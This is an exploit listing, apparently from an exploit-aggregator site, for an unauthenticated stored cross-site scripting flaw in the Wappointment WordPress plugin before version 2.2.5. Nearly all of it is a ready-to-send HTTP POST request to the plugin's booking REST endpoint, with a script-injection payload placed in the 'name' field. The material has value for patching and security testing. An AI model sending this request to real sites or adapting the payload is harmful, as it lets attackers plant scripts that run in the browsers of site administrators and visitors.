Exploit for Wappointment < 2.2.5 - Unauthenticated Stored Cross-Site Scripting

## https://sploitus.com/exploit?id=WPEX-ID:A2B816A4-9FAF-40EA-A81D-88687F99DE77
POST /wp-json/wappointment/v1/services/booking HTTP/1.1
Content-Length: 205
Accept: application/json, text/plain, */*
Content-Type: application/json
Referer: http://domain.com/booking-page/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"email":"testemail@testemail.com","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}